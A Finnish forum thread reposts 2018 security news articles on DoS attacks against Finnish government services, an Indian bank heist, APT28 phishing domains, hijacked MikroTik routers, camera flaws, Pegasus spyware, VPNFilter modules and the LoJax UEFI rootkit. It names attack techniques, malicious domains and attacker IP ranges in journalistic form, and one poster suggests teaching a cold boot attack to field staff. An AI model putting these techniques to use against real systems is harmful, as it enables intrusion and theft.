Cyber-ketju: verkkovakoilu,kännyköiden ja wlanien seuranta, hakkerointi, virukset, DoS etc

Google seuraa sinua, vaikka kieltäisit sen ja estäisit sen asetuksista – näin poistat hakuhistorian oikeasti
google%20maps%20helsinki.jpg




Oletko estänyt Googlen sijaintihistorian toiminnan Android-puhelimesi asetuksista? Tuore tutkimus osoittaa, että luulosi saattaa olla väärä.
Associated Pressin ja Princetonin tutkijoiden yhteisessä tutkimuksessa havaittiin, että Google Maps ja Googlen hakukone tallentavat yhdessä käyttäjien sijainnin ilman käyttäjien suostumusta.
Ongelmana on se, kuinka sijaintihistoria kytketään pois päältä.

Estäminen pelkästään puhelimen asetuksista ei nimittäin riitä, vaan toiminto pitää estää myös Google-tilin verkkoasetuksista.
Niihin pääset käsiksi sivulta myaccount.google.com/activitycontrols ja kytkemällä pois Web & App Activity -toiminnon.
Mikäli haluat päästä eroon kokonaan Googlen sijaintihistoriasta, mene verkkosivulle myactivity.google.com (suom. Omat tapahtumat), opastaa Lifehacker.
Valitse sivun vasemmasta laidasta Item View (Kohdenäkymä), joka näyttää kunkin Google-tuotteen tallentamat tiedot. Valitse listasta Maps tai erittele karttatulokset hakukentän suotimien avulla. Valitse haluamasi hakutulokset ja klikkaa hakukentän "hampurilaisvalikkoa", josta voit poistaa tulokset valitsemalla "Delete results" (Poista tulokset).

Sijaintitiedot mahdollistavat esimerkiksi Google Maps -karttapalvelun toiminnan sekä työmatkoihin liittyvät suositukset. Niiden hyväksikäyttö on kuitenkin osa myös Googlen muuta liiketoimintaa, ja niiden avulla voidaan kohdentaa esimerkiksi mainoksia.

https://www.tivi.fi/Kaikki_uutiset/...a-nain-poistat-hakuhistorian-oikeasti-6736112

 
"Palvelunestohyökkäys on kaatanut useiden viranomaisten verkkosivustoja – tunnistautuminen ei onnistu Kelan sivuilla
https://yle.fi/uutiset/3-10349357
12.8.2018 klo 18:33

Palvelunestohyökkäys kaatoi iltapäivällä useiden valtionhallinnon viranomaisten ja ministeriöiden verkkosivustoja, kertoo Valtion tieto- ja viestintätekniikkakeskuksen Valtorin toimitusjohtaja Pasi Lehmus.

Palvelunestohyökkäys tapahtui Lehmuksen tietojen mukaan noin kello 16.30. Hyökkäys tapahtui Valtorin palveluita vastaan. Se estää useisiin verkkopalveluihin tunnistautumisen, ja osa sivustoista ei aukene ollenkaan.

Muun muassa valtioneuvoston, sisäministeriön, opetus- ja kulttuuriministeriön sekä sosiaali- ja terveysministeriön sivut ovat poissa käytöstä. Myös poliisin ja tullin verkkosivut ovat kaatuneet.

Terveydenhuollon Omakannan, Kelan ja Väestörekisterikeskuksen sivuille kirjautuminen ei onnistu. Palvelunestohyökkäys on Lehmuksen mukaan selätetty, ja nyt verkkosivustoja aletaan nostaa ylös."


https://www.poliisi.fi/keskusrikosp...tunutta_epailtya_palvelunestohyokkaysta_73366
 
Cosmos Bank in India says that hackers made off with $13.4m in stolen funds over the weekend.


Multiple reports out of the country say that a group of attackers used cloned cards to withdraw cash from ATMs at a set time and perform a fraudulent SWIFT money transfer. Together, the efforts resulted in about Rs 94 crore ($13.4m) being stolen from the bank and its account holders.


The attack was believed to have taken place in two phases. The first, on Saturday between 1500 and 2200 local time, was an international effort with money mules in 28 different countries, all extracting cash from their local ATMs. According to the Hindustan Times, 15,000 transactions were carried out over the seven-hour period.


The second phase took place Monday, when a SWIFT transaction saw Cosmos move Rs 13.5 crore ($1.93m) to an account at a bank in Hong Kong.


Security reporter Brian Krebs unknowingly broke word about the heist three days ago when he got hold of a confidential alert sent from the FBI to US banks warning of a pending ATM cash-out attack against a then-unnamed financial institution (later found to be Cosmos.)


The warning notes that the Bureau was confident of a cash-out operation set to occur over the weekend (when banks are closed) and that it thought the operation was the result of a breach at a card issuer.


"The cyber criminals typically create fraudulent copies of legitimate cards by sending stolen card data to co-conspirators who imprint the data on reusable magnetic strip cards, such as gift cards purchased at retail stores," the FBI warned.


"At a pre-determined time, the co-conspirators withdraw account funds from ATMs using these cards."


The Indian bank has said account holders' money is safe, but it has suspended online banking in the wake of the incident.


While no official culprit for the attack has been named, India's Economic Times has reported that North Korea's Lazarus Group (who have previously targeted banks in the region) is the likely offender.
https://www.theregister.co.uk/2018/08/15/cosmos_bank_raided/
 
Microsoft has claimed it thwarted a Russian-backed phishing attack by seizing control of fake copies of right-leaning American think tanks' websites – including one led by a prominent Donald Trump critic.

A US court order authorised Microsoft to apprehend six domains that the Windows maker said were linked to the APT28 hacking crew, also known as Fancy Bear and Strontium, according to Redmond.

The Hudson Institute mainly focuses on American national security and foreign policy issues while the International Republican Institute promotes the foreign policy ideas of the US Republican Party, focusing on attitudes to America overseas.

"We have now used this approach 12 times in two years to shut down 84 fake websites associated with this group," boasted Microsoft prez Brad Smith in a corporate blog post.

The six domains were:


  • my-iri.org
  • hudsonorg-my-sharepoint.com
  • senate.group
  • adfs-senate.services
  • adfs-senate.email
  • office365-onedrive.com
The domain for the Hudson Institute is hudson.org, while the IRI resides online at iri.org. The similarities may have been enough to trick the unfamiliar into visiting these sites and entering login credentials or downloading malware.

"We currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains," Smith said.

The IRI was headed up by American senator John McCain, one of president Donald Trump's more outspoken critics from within his own party. McCain, who was recently diagnosed with brain cancer, stepped down from the IRI leadership at the end of July and anointed Dan Sullivan as its new chairman. Like McCain, Sullivan is a critic of Trump.

"The Kremlin has particularly sought to discredit anti-Trump groups, including within the Republican party," opined Dan Arenson, an analyst from infosec firm Falanx Group.
https://www.theregister.co.uk/2018/08/21/microsoft_seizes_apt28_linked_domains/
 
Tämä on aivan uusi

Internet-connected 3D printers are at risk of being tampered with or even sabotaged because users fail to apply security controls, a researcher has warned.

Xavier Mertens, a senior handler for the SANS Internet Storm Center (ISC) and freelance cybersecurity consultant, found more than 3,700 3D printers directly connected to the internet.

"These printers are controlled using the open source software package 'OctoPrint' but it's likely there are other tools that are similarly affected. OctoPrint is not meant to be exposed in this way, and it explains in its documentation how to deploy the software in a safe way," Mertens explained.

OctoPrint is a web interface for 3D printers that allows users to control and monitor the printer. As things stand, many OctoPrint instances are not properly configured and do not enforce authentication, according to Martens. Once they have access to the printer, an attacker would be able to download the files that describe parts being printed.

Some of these G-code files may be proprietary, copyrighted or contain trade secrets. An attacker would also be able to swap out these files, replacing them with files that describe similar parts that are "weakened" to produce substandard or unsafe parts.

In response to questions from The Register, an OctoPrint dev emphasised the need for user education.

"This really has nothing to do with 'lack of security controls', the controls (e.g. ACL) are there, it's been recommended over and over again that users should NOT just port forward! The problem here is users going out of their way to expose internal services on the public net.

"There's no way to prevent people from exposing internal services on the net. I try to educate, I'm working on yet another prominent warning, but I can't force people to perform proper (and inconvenient) network security."

3D printers are used to make anything from toys to medical components so if a part's dimensions were meddled with, it could have serious safety implications.

"The problem is not related to the printer, rather if OctoPrint is incorrectly configured and left open on the internet," Mertens told El Reg. In addition, some printers do not have safety switches to prevent them from overheating, which means an attacker could attempt to start a fire by uploading a malicious file.

Mertens said both 3D printers and the files for parts being printed can be protected by ensuring network segmentation; enabling the security controls provided by the tool; and other access controls.

More on his thoughts on the subject can be found in an ISC blog post here.
https://www.theregister.co.uk/2018/09/04/3d_printers_hackable/
 
Mitenhän paljon on tietokoneita, printtereitä, puhelimia ja televisioita joihin ei ole tullut eikä tule päivitystä liittyen tähän:
https://www.krackattacks.com/

Voiko ilmaantua "mato" joka leviää wifi-verkosta toiseen? tai vaan seuraa verkkojen liikennettä ja välittää tietoa eteenpäin?
 
Voiko ilmaantua "mato" joka leviää wifi-verkosta toiseen? tai vaan seuraa verkkojen liikennettä ja välittää tietoa eteenpäin?

Menee liian monimutkaiseksi madolle, joten käytännössä en näe tälläistä, mutta periaatteessa tuollainen on mahdollista toteuttaa. Käytännössä WPA2 tulee jäämään perinne systeemiksi ja siirrytään astetta parempaan salaukseen, kuten kävi WEPn kanssa aikoinaan.

Toisin sanoen on helpompaa laittaa WPA ja WPA2 salauksen murtaminen hyökkäyskittiin niin muiden WIFI työkalujen lisäksi.
 
Viimeksi muokattu:
Researchers at China's Netlab 360 have discovered that thousands of routers manufactured by the Latvian company MikroTik have been compromised by malware based on a vulnerability made public by WikiLeaks' publication of tools from the CIA's "Vault7" toolkit. While MikroTik posted a software update for the vulnerability in April, researchers found that more than 370,000 MikroTik devices they identified on the Internet were still vulnerable.

According to a report by Netlab 360's Genshen Ye, more than 7,500 of them are actively being spied on by attackers, who are actively forwarding full captures of their network traffic to a number of remote servers. Additionally, 239,000 of the devices have been turned into SOCKS 4 proxies accessible from a single, small Internet address block.

MikroTik provides routing and wireless hardware for Internet service providers and businesses worldwide, including ISP and campus network infrastructure such as outdoor fiber routers and wireless backbones. The vulnerable routers discovered by Netlab 360, still configured with an unpatched interface for the company's Winbox router configuration utility, are widely distributed—but the largest concentrations of affected networks were in Brazil and Russia. There were 14,000 devices identified operating using US-based IP addresses.

Previously, researchers at Trustwave had discovered two malware campaigns against MikroTik routers—the first originally targeting routers in Brazil with CoinHive malware. The attack injected the Coinhive JavaScript into an error page presented by the routers' Web proxy server—and redirected all Web requests from the network to that error page. However, in routers affected by this type of malware found by the Netlab 360 team, the attackers had shot themselves in the foot. "All the external web resources, including those from coinhive.com necessary for web mining, are blocked by the proxy ACLs (access control lists) set by attackers themselves," noted Ye.

Another attack discovered by the Netlab 360 team has turned affected routers into a malicious proxy network, using the SOCKS4 protocol over a very non-standard TCP port (4153). "Very interestingly, the Socks4 proxy config only allows access from one single net-block, 95.154.216.128/25," Ye wrote. Almost all of the traffic is going to 95.154.216.167, an address associated with a hosting service in the United Kingdom.

The attack includes the addition of a scheduled task to report the router's IP address back to the attacker to help maintain the persistence of the SOCKS proxy if the router is rebooted. It's not clear what the proxies are being collected for, but they're currently being used to continuously scan for other vulnerable routers.

The eavesdropping attack leverages MikroTik's built-in packet-sniffing capabilities. The sniffer, which uses the TZSP protocol, can send a stream of packets to a remote system using Wireshark or other packet capture tools. The Netlab 360 team found that more than 7,500 routers that had been compromised were streaming network traffic—largely FTP and email focused traffic, as well as some traffic associated with network management—to a small number of addresses. The vast majority of the streams (5,164 of them) were being sent to an address associated with an ISP in Belize.
https://arstechnica.com/information...sed-to-build-vast-proxy-army-spy-on-networks/
 
The man who federal prosecutors say operated the Kelihos botnet has now pleaded guilty.

During a hearing in federal court in Hartford, Connecticut on Wednesday, Peter Yuryevich Levashov admitted guilt in one count of causing intentional damage to a protected computer, one count of conspiracy, one count of wire fraud, and one count of aggravated identity theft.

The 38-year-old Russian’s botnet, which dated back to 2010, spanned more than 10,000 machines, and was primarily used to send out spam, steal logins, distribute ransomware, and more. Federal authorities shut it down in 2017.

"For over two decades, Peter Levashov operated botnets which enabled him to harvest personal information from infected computers, disseminate spam, and distribute malware used to facilitate multiple scams," said Assistant Attorney General Brian Benczkowski said in a statement.

The Department of Justice said that Levashov "controlled and operated multiple botnets, including the Storm, Waledac and Kelihos botnets, to harvest personal information and means of identification (including email addresses, usernames and logins, and passwords) from infected computers."

In 2009, he was formally charged in the District of Columbia with operating the "Storm" botnet. As Ars has previously reported, Levashov has long been on a list of the World's Ten Worst Spammers, maintained by antispam volunteer organization Spamhaus.

Levashov was arrested in Barcelona, Spain in April 2017 and was extradited to the United States in February 2018, where he has remained in custody. His sentencing has been scheduled for September 6, 2019.
https://arstechnica.com/tech-policy...uilty-admits-he-ran-notorious-kelihos-botnet/
 

If you can steal someone's laptop, leave it switched on in sleep mode, crack it open, hook up some electronics to alter settings in the BIOS firmware, restart it, and boot into a custom program... you can swipe crypto keys and other secrets from the system.

When computers are restarted, the motherboard firmware can wipe the RAM clean to remove any lingering data. It is possible to, while a stolen machine is still in sleep mode, reprogram the firmware's settings to disable this memory zero'ing, and then reboot it into a custom operating system on a USB stick or similar that then scans the RAM for any sensitive information. This information can be used to decrypt encrypted hard drives, and so on.

Whether or not it's easier than smacking the laptop owner with a two-by-four until they give up their login password is, well, an exercise left to our more sociopathic readers.

F-Secure's Olle Segerdahl and Pasi Saarinen this week detailed their memory-slurping technique, effectively bringing cold boot attacks out of the deep freeze from 2008 and putting them back into play. The pair reckon the approach will work against nearly all modern laptops, including Apple Macs.

The hack is tricky, though once mastered, it can be replicated on any purloined machine.
https://www.theregister.co.uk/2018/09/14/cold_boot_attack_reloaded/

Kätevä hyökkäys minkä voi opettaa kenttäväelle, jos on kriittinen tarve päästä koneeseen sisälle ilman sen fyysista haltuunottoa.
 
It has never been easier to conduct a cyber attack. There now exists a range of off-the-shelf tools and services that do all the heavy lifting – you just need to pick an approach and tool you like best.

There's ransomware-as-a-service with its "here's one I made earlier" code, search engines that show connected interfaces with known vulnerabilities, and downloadable and easy-to-use scanning tools for the discerning script kiddie.

Heck, why bother with tools that need time and effort to find vulnerable systems? Why not just steal credentials and log in via the front door?
https://www.theregister.co.uk/2018/09/17/compromised_credentials/

Hyvä katsaus tämän päivän todellisuuteen. Jos foliota hieman raottaa niin voi helposti huomata että homma on samanlailla kuin se oli vuosituhanteen vaihteessa ja vaikka tekniikassa, laiteissa ja ohjelmistoissa ollaan menty eteenpäin, ihminen on pysynyt samanlaisena. Kylmä todellisuus on että mikään ei ole murtovarma mutta homma voidaan tehdä vaikeaksi yrittäjille.
 
Researchers have uncovered two flaws that leave more than 100,000 NUUO-branded internet-connected surveillance cameras open to remote takeover.

Tenable Research on Monday laid claim to discovering two bugs in the NUUO Network Video Recorder software that can be exploited to covertly access a camera's video feed or simply take over the device with malware.

The bugs, named "Peekaboo" for marketing purposes, were both spotted in the NVRMini2, a network-attached device that both stores video recordings and acts as a control gateway for admins and remote viewers.

The first of the two flaws (CVE-2018-1149) is a remote code execution vulnerability that can be exploited by overflowing a buffer. An attacker exploits the bug by connecting to a network- or internet-facing device, and submitting a malformed cookie to its web-based control panel that triggers the flaw in the cgi_system binary.

Once the bug has been exploited, the attacker would be able to inject and execute commands with root privileges. From there, the attacker would be able to do anything from seize control of the camera and access all of its video footage to loading up the device with botnet clients to use for other attacks.

The second flaw, meanwhile, would allow an attacker to covertly access a network- or internet-connected camera's controls without needing to trigger a buffer overflow or other programming cockup. Rather, CVE-2018-1150 is a leftover bit of debug code that allows the attacker to pull up all user accounts and change passwords. The attacker would also be able to control the camera and view recordings.
https://www.theregister.co.uk/2018/09/17/nuuo_cameras_rce/
 
The infamous Pegasus spyware, which targets iPhones and Android devices, has allegedly infiltrated 45 different countries across the globe — and six of those countries have used surveillance malware in the past to abuse human rights, a group of researchers claimed Tuesday.

Researchers from The Citizen Lab scanned the internet in a massive project that took place between 2016 and 2018, sniffing out servers associated with the Pegasus mobile spyware, attributed to Israel-based company NSO Group as an offering for state-level actors around the world.

“The number of Pegasus servers we detected in our scans ballooned from about 200 in 2016 to almost 600 in 2018. This may be an indication that NSO Group is scaling up their operations,” Bill Marczak, senior research fellow at The Citizens Lab and one of the researchers on the team, told Threatpost.

The malware has been active since August 2016 when it was discovered that the NSO Group was selling the mobile spyware to governments and third-parties who wanted its surveillance capabilities in order to read texts, track calls, collect passwords, trace phone locations and gather data from apps of victims.

Pegasus is generally spread through a specially crafted exploit link (via phishing techniques) which when clicked delivers a chain of zero-day exploits to penetrate security features on the phone. The Citizen Lab’s latest report shows that Pegasus has grown more widespread – and alleges that it’s being used by certain countries to target human rights.

That includes the expansion of Pegasus usage in Gulf Cooperation Council countries in the Middle East – particularly to track dissidents, such as UAE activist Ahmed Mansoor, who was targeted by the spyware in 2016; and an Amnesty International staffer and Saudi activist in June 2018.

“Our findings paint a bleak picture of the human-rights risks of NSO’s global proliferation,” researchers said in a Tuesday post. “At least six countries with significant Pegasus operations have previously been linked to abusive use of spyware to target civil society, including Bahrain, Kazakhstan, Mexico, Morocco, Saudi Arabia and the United Arab Emirates.”
https://threatpost.com/dangerous-pegasus-spyware-has-spread-to-45-countries/137506/
 
shutterstock_enigma_machine.jpg

The Bombe team at The National Museum Of Computing (TNMOC) has succeeded in breaking an Enigma-encrypted message in a live Poland-to-England demo.

The demonstration was described by TNMOC as a tribute to Polish cryptographers and wartime Bletchley Park staff.

The reconstructed Turing-Welchman Bombe at TNMOC in Bletchley Park found the settings and key needed to break an Enigma message. The techniques used were the same as those used by the WWII codebreakers.
https://www.theregister.co.uk/2018/09/21/enigma_live_crack_honours_poles/
 
Verkkoisku aiheuttaa parhaillaan ongelmia monissa suomalaisissa verkkopalveluissa
https://www.tivi.fi/Kaikki_uutiset/...nissa-suomalaisissa-verkkopalveluissa-6742438
”Teemme toimenpiteitä parhaillaan ja rajaamme liikennettä. Suljemme pois tiettyä ulkomailta tulevaa liikennettä, jolloin kuormitusta saadaan laskettua ja palvelujen normaalikäyttö onnistuu taas”, Holmroos-Kolari sanoo. Jälkeenpäin VRK:ssa aiotaan selvittää, miksi käytössä olevat hyökkäyksenestopalvelut eivät purreet iskuun.


Suomi.fi-tunnistuksessa on kohdistetusta palvelunestohyökkäyksestä johtuva häiriö

- Poliisin sähköinen asiointialusta ei toimi
- Kela kuvailee henkilöasiakkaiden asiointipalvelussa olevaan häiriötä laajamittaiseksi ja se estää sähköisen asiointipalvelun ja puheluiden yhdistymisen
- puhelut eivät mene perille myöskään käräjäoikeuksiin tai maistraatteihin
- Verohallinnon ja Trafin palveluihin

Väestörekisterikeskus on ryhtynyt toimenpiteisiin ja pyrkii saamaan palvelun toimintakuntoon mahdollisimman pian.
 
Internet censorship is on the rise, and data from Freedom on the Net, based on an annual assessment of the situation of Internet freedom in 65 countries, reveals that not only has Internet censorship been on the rise for seven straight years now but developed nations are not exempt.

Thanks to recent policy changes such as the US government legalizing the ability of ISPs to sell user data without user permission, the repeal of net neutrality, and the metadata retention scheme in Australia, VPN usage is on the rise –, particularly in the West. According to a particular source, VPN usage rose 170 percent in the US in reaction to net neutrality repeal, 470 percent in Australia, and 89 percent in Turkey in reaction to similar attempts to curtail Internet freedom.

Hotspot Shield, which is perhaps the biggest VPN service in the world today, reported having over 100 million downloads in 2017 alone (more than it has ever had in any given year) — a sign of increasing interest in VPN usage thanks to growing censorship. What’s more interesting, however, is the percentage of this growth that came from the US: while Hotspot Shield was mostly used outside the US before 2017 (with about 80 percent of people using it internationally), that all changed in 2017.

AnchorFree, the company behind Hotspot Shield, credits recent policy changes and events in the US for this growth: Hotspot Shield noticed its first big spike in usage from the US in March 2017 when Congress voted to allow internet service providers to sell user data without permission from the user, it noticed another spike after the massive Equifax hack that exposed data of over 140 million users, then it noticed an even bigger spike thanks to the repeal of net neutrality.

In the face of growing censorship, free VPNs, in particular, have an allure: for one, privacy is expected to be a basic human right, and the vast majority of people in censorship-ridden countries — such as Eritrea, Syria, or Ethiopia — cannot afford to pay a monthly fee to use a VPN service on top of the cost of their monthly Internet service subscription.

Unfortunately, free isn’t always good. Using free VPNs, in particular, is like having a fox guard the henhouse.
https://www.hackread.com/almost-every-major-free-vpn-service-is-a-glorified-data-farm/
 
Cunning malware VPNFilter remains under active development, and is acquiring ever more dangerous features.

That's the conclusion Cisco's Talos Intelligence security team reached after delving into recent samples and identifying seven “third-stage VPNFilter modules that add significant functionality to the malware”.

VPNFilter rose to prominence in May, when Talos found half a million pwned home routers and NAS boxes in 54 countries. The FBI attributed the attacks to Russia's Sofacy group (“Fancy Bear”), seized a command-and-control domain, and asked people to reboot their routers.

While maintaining that VPNFilter has mostly been neutralised, Talos' Edmund Brumaghin wrote that “it can still be difficult to detect in the wild if any devices remain unpatched”.

The infosec company has stayed on the case, and this Wednesday released a blog post saying the new functions it has discovered include an “expanded ability” to attack endpoints from compromised network devices, data filtering, “multiple encrypted tunnelling capabilities” to conceal C&C and data exfiltration traffic, and a tool to build a network of proxies to conceal the true source of VPNFilter traffic.

The specific modules are called:

  • htpx – HTTP traffic redirection and traffic inspection;
  • ndbr – a multi-functional SSH utility;
  • nm – network mapping from compromised devices;
  • netfilter – a denial-of-service utility;
  • portforwarding – forwards network traffic to attacker-specified infrastructure;
  • socks5proxy – Sets up a SOCKS5 proxy on the compromised device; and
  • tcpvpn – Sets up a reverse-TCP VPN on the compromised device.

The other important discovery Talos highlighted in the post was the attackers' use of a MikroTik administration utility called Winbox, a small Windows 32 utility that mirrors the functions offered on the Web-based admin interface.
https://www.theregister.co.uk/2018/09/27/fancy_bear_modules/
 
ESET Research has published a paper detailing the discovery of a malware campaign that used repurposed commercial software to create a backdoor in computers’ firmware—a “rootkit," active since at least early 2017 and capable of surviving the re-installation of the Windows operating system or even hard drive replacement. While the malware had been spotted previously, ESET’s research is the first to show that it was actively attacking the firmware of computers to establish a tenacious foothold.

Dubbed “LoJax,” the malware is the first case of an attack leveraging the Unified Extensible Firmware Interface (UEFI) boot system being used in an attack by an adversary. And based on the way the malware was spread, it is highly likely that it was authored by the Sednit/Fancy Bear/APT 28 threat group—the Russian state-sponsored operation tied by US intelligence and law enforcement to the cyber-attack on the Democratic National Committee.

UEFI uh-oh

There have been a number of security concerns about UEFI’s potential as a hiding place for rootkits and other malware, including those raised by Dick Wilkins and Jim Mortensen of firmware developer Phoenix Technologies in a presentation at UEFI Plugfest last year. “Firmware is software and is therefore vulnerable to the same threats that typically target software,” they explained. UEFI is essentially a lightweight operating system in its own right, making it a handy place to put rootkits for those who can manage it.

WikiLeaks’ Vault 7 files showed that the CIA apparently developed an implant for Apple's computers that used the Extensible Firmware Interface (the predecessor of UEFI) but required physical access to the targeted computer and a malicious Thunderbolt Ethernet adapter (called the “Sonic Screwdriver”). But LoJax is an entirely different animal—it was built to be deployed remotely, using malware tools that can read and overwrite parts of the UEFI firmware’s flash memory.

“Along with the LoJax agents,” ESET researchers noted, “tools with the ability to read systems’ UEFI firmware were found, and in one case, this tool was able to dump, patch and overwrite part of the system’s SPI flash memory. This tool’s ultimate goal was to install a malicious UEFI module on a system whose SPI flash memory protections were vulnerable or misconfigured.”

Because of variations in the implementation of UEFI, those sorts of memory protection issues—the very sort of thing Wilkins and Mortensen warned of—have been entirely too common. And ESET researchers found at least one confirmed case of a successful deployment of LoJax.

Good hackers borrow, state hackers steal

While LoJax shows all the hallmarks of a state-funded attack, the Fancy Bear team had a little bit of a head start when it came to the UEFI payload—the Bears borrowed from a commercial software product that was purpose-built to stay active in a computer’s firmware. LoJax’s rootkit is essentially a modified version of a 2008 release of the LoJack anti-theft agent from Absolute Software, known at release as Computrace.

“LoJack attracted a lot of attention in recent years as it implements a UEFI/BIOS module as a persistence mechanism,” the ESET team wrote. That firmware module ensured a software “small agent” stayed installed on the computer, which connected to an Absolute Web server—even if the computer had its drive wiped. In other words, Computrace was a commercially developed firmware rootkit.

The protocols used by the client associated with LoJack/Computrace had no authentication. So if someone were able to impersonate the Absolute servers, they would have been able to hijack the client to their own ends. While this issue was brought up by researchers in 2014, it would be four more years before there was a hint that someone had actually done that.

On May 1, Arbor Networks reported the discovery of “trojanized” samples of the LoJack small agent—versions that had been modified to communicate with servers suspected to be connected to Fancy Bear activities. Domains used by the malware were the same used in 2017 for another backdoor known as SedUploader. The differences between the legitimate LoJack client and the malicious client were so small—in the tens of bytes, according to the ESET researchers—that they were largely not being detected as malware.

“At the time the [Arbor Networks] blog was published,” the ESET team wrote, “we had found different LoJax small agents targeting different entities in the Balkans as well as Central and Eastern Europe, but had no idea how they were installed.” While some traces of other Fancy Bear/Sednit malware were found in some cases, there were others where no means of delivery was apparent.

And then the researchers found two tools on an infected system—one intended to read the Serial Peripheral Interface (SPI) flash memory associated with UEFI firmware and another to overwrite that memory. The reader tool was based on drivers from a free, legitimate tool called RWEverything. The writer tool, ReWriter_binary, looks for the section of the firmware flash memory containing Driver Execution Environment (DXE) drivers—drivers that execute very early in the UEFI boot-up. It then writes its own malicious DXE driver into that memory area, attempting to circumvent any restrictions set in firmware to prevent such a write. Unfortunately, many of the safeguards to prevent such malicious writing to BIOS are turned off by default in many UEFI implementations.

In another bit of borrowing, the code in the malicious UEFI module uses an NTFS driver to access the Windows disk partition to make changes and install its agent. This NTFS driver was stolen from leaked software written by the Milan-based information security (and offensive hacking for hire) company Hacking Team. So really, this Russian state-sponsored rootkit was a team effort.
https://arstechnica.com/information...aptop-security-software-hijacked-by-russians/
 
Back
Top